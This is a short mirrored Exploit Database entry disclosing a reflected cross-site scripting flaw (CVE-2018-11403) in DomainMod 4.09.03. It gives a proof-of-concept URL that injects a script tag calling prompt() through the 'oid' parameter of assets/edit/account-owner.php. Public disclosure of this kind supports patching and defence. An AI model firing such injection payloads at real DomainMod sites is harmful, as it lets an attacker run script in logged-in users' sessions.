DomainMod 4.09.03 – ‘oid’ Cross-Site Scripting

• Exploit Database
• 40 阅读

• 作者： longer
  日期： 2018-05-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44782/

• # Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter
  # Date: 2018-05-28
  # Exploit Author: longer（76439392@qq.com）
  # Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
  # Software Link: domainmod (https://github.com/domainmod/domainmod)
  # Version: v4.09.03
  # CVE : CVE-2018-11403
   
  An issue was discovered in DomainMod v4.09.03.（https://github.com/domainmod/domainmod/issues/63）
  After the user logged in, open the url :
  http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E